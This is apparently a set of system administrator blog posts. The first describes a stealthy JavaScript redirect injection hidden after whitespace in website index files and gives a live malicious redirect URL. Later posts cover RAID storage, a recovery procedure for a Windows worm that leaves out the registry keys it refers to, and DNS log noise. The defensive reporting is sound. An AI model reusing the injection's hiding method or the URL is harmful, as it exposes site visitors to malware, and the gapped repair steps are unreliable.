Below is the javascript code of an “injection” that inserts itself into the index file of a website. It is designed to go undetected by only redirecting seldomly and randomly. It is placed at the bottom of the source code, with a significant gap in whitespace after the end of the regular source code (115 lines in all cases). In most of the cases that I have come across, it redirects to a “spyware” or “virus” site. It also goes undetected by antivirus programs (Trend Micro, Panda, Avast). It works with Mozilla (2.0.0.11) and IE7 (haven’t tested it in others). I’ll look into it further once I decode the script itself.

One of the sites it redirects to is: http://e.pepato.org/e/adsr.php?t=0

It infects each individual .php file and does not re-infect after the initial infection. I have created new sites and cleaned infected .php files and it has disappeared completely. It injects this code into .php (and .html) files about 115 lines below the end line. It ONLY infects index.php/html files in the root directory of the website. If you name your file: index2.php – it will not be infected. The “modified date” time stamps DO change with the infection. There was a spread of 1 minute for hundreds of .php files. If you need a quick way to search all index.php/html files on a server, download notepad++ and use the “search in directory” feature for certain strings of text. Alternatively, once you find the time stamp of infection, search for files modified at that time.

Looks like a newer one, I’ve heard reports of similar activity as far back as mid January.

(No Ratings Yet)

6 Comments |  Print This Post

I purchased the Dell MD1000 15 disk Direct Attached Storage Array in November. The enclosure itself is a JBOD system (Just a Bunch of Disks) because the controller inside does not support RAID. The RAID functionality of the system is achieved through implementing a PERC 5/e or 6/e controller in the server itself. The MD1000 can be daisy-chained for a total of three units supporting 45 disks. The MD1000 has dual controllers and dual power supplies for redundancy – something that should be expected in an expensive (albeit inexpensive in enterprise terms) product.

I have it hooked up to a PERC 5/e dual SAS (x4-type external) controller that supports RAID 0, 1, 5, 10, 50. Dell says you can configure the controller through pressing CTRL-R after the BIOS, but the tools are lackluster at best. Be sure to download Dell’s OpenManage system.

Below is my final configuration for my database and file server.

1. 1 – “hot-spare” 73GB (SAS 15K Seagate)
2. 4 – RAID 10 – 73 GB (SAS 15K Seagate)
3. 10 – RAID 10 – 750 GB (SATA 7.2K Seagate)
4. 2 – “cold-spare” 750 GB (SATA 7.2K Seagate)

Why not RAID 5? I don’t want the write-penalty that RAID 5 comes with, especially on a database server with the 4 SAS drives. The SATA array is cheap enough at $160 CDN per 750GB drive.

Overall I am satisfied with the system. The main concern was reliability. When a friend of mine brought up the fact that he could have done it less expensively with a computer in a large case and a bunch of drives, I agreed. With the MD1000 you get dual controllers, dual power supplies, and the ability to connect to two servers, which also helps if you are in a cluster. If you need network storage, definitely get a SAN array (not to be confused with NAS).

I have a decent crop of benchmarks of the test system before I finalized my configuration. I’ll post it later today once I get to a computer with Excel (or OpenOffice) to do some graphs.

(No Ratings Yet)

2 Comments |  Print This Post

As most of you know, Windows is a hotbed of viruses (not virii), worms, and malware. I’ve had the pleasure of finding a new worm that attacks the TCP/IP service: tcpsrv.exe in the C:\Windows\System32\ folder. This file is needed for Active Directory and the Workstation Driver (ie. Client for Microsoft Networks). With this file removed, you cannot remote into your server, run active directory and as a result Exchange Server. You can, however, serve web pages just fine with IIS.

I have three Antivirus “managers” on my internal and external network. Panda Enterprise, Trend Micro ServerProtect and Avast Antivirus for Server 2003. My favorite is Avast because it is easy to use and “cheap.” The TCP/IP worm was not detected by Panda or Trend Micro. Avast only knew it was malicious and recommended to quarantine or delete it upon restart. If you delete it upon restart or even quarantine, your server will no doubt be crippled. You will not be able to log into your server through RDP (Remote Desktop).

When you try to login through RDP (Remote Desktop) you type your username and password and an error pops up: “Cannot log on. The Workstation driver is not installed.” “Workstation Driver” is the common name for Client for Microsoft Networks found in your network adapter properties. So how do you fix your server if you cannot log into it? Well, it takes some telnet and some creative FTP in the Windows directory, which I will explain in a different post. For now, you’ll need physical access to your server or someone with physical access that can follow instructions.

You can login to your server at the physical workstation no problem because only the RDP login utilizes the TCP/IP Service, unlike the regular workstation login. Because the TCP/IP service is missing or corrupted, the following services (all found in services.msc at the run command) will not work:

1. Workstation (or client for Microsoft networks)
2. Server
3. TCP/IP Service
4. RPC Locator
5. Netlogon

The RPC Locator and Net Logon depend on the Workstation service. All of these services should be set to Startup Type: Automatic and should be started on any machine. The Server service is what controls the domain controller or lets your computer know WHAT it is. If you try to access Active Directory an error saying “the domain could not be found” or “the computer is not part of a domain.” This is important for active directory and Exchange Server. Server requires TCP/IP service to run. Steps:

1. Locate a fresh copy of tcpsrv.exe in a backup or i386 folder of the install disc. For Windows 2003 SP2 the latest revision is 2006. Put it into the System32 directory and manually restart all the above services. If this works, fantastic, it was easy contained worm. If not, read on.

2. If the above did not work you’ll need to go into the network adapter properties and delete “Client for Microsoft Networks.” You will need to restart after you have done this. Once restarted, re-install Client for Microsoft Networks. You will need your Windows 2003 CD. Restart again.

3. Verify that the startup type for the RPC Locator service is set to Automatic and start the service. Do the same for the Net Logon service but do not start it yet. Start Registry Editor (Regedt32.exe) and then click the DependOnService value under the key in the registry:

4. On the Edit menu, click Multi String, type LanmanServer on a line by itself, and then click OK. In the Services tool, start the Netlogon service. If you cannot start it, continue with the steps below. If it does start, then start the Server service and verify Active Directory Users and Computers opens and you can see the available users/computers.

5. If the above still didn’t work, you may also have a corrupt TCP/IP stack and corrupt Winsock2. You’ll need to restart your computer in “Directory Services Restore Mode” by pressing F8 after the BIOS information has displayed. Once you have logged in, open regedit32.exe and find and delete the following registry keys:

6. Locate the Nettcpip.inf file in your Windows\inf directory and open it in notepad. Find [MS_TCPIP.PrimaryInstall] and edit Characteristics = 0xa0 to 0x80.

7. Go into the properties of your network adapter and click “Install,” select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK.

8. This allows you to remove the TCP/IP service from a domain controller (which was not possible before). Now in the properties box of the network adapter select “Internet Protocol (TCP/IP)” and click Uninstall. Once it has uninstalled. Restart the computer in Directory Services Mode again. Reinstall the Internet Protocol (TCP/IP) by going into the properties of your network adapter and clicking “Install,” select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK.

9. Restart your computer in normal mode. All services should have started. If not, verify the above services are set to automatic and try to start them manually.

(average: 5.00 out of 5)

4 Comments |  Print This Post

With some of the servers I maintain, prisoner.iana.org shows up as a DNS entry in the system logs. Because of the name, it “looks” suspicious. It is nothing to worry about: there are no hackers, and something isn’t wrong with your system.

IANA was the name of the organization that was responsible for handing out IP address blocks back in the day.

There was a need for a placeholder zone for the three blocks of non-routable addresses, so IANA setup three DNS servers: blackhole-1.iana.org, blackhole-2.iana.org and prisoner.iana.org.

If a system with the address range: 192.168.XXX.XXX tries to register its PTR record without a local DNS server, it will try to register with prisoner.iana.org. Obviously prisoner.iana.org will reject the request. Hence the many instances of this address in the DNS logs / Event Viewer.

(No Ratings Yet)

4 Comments |  Print This Post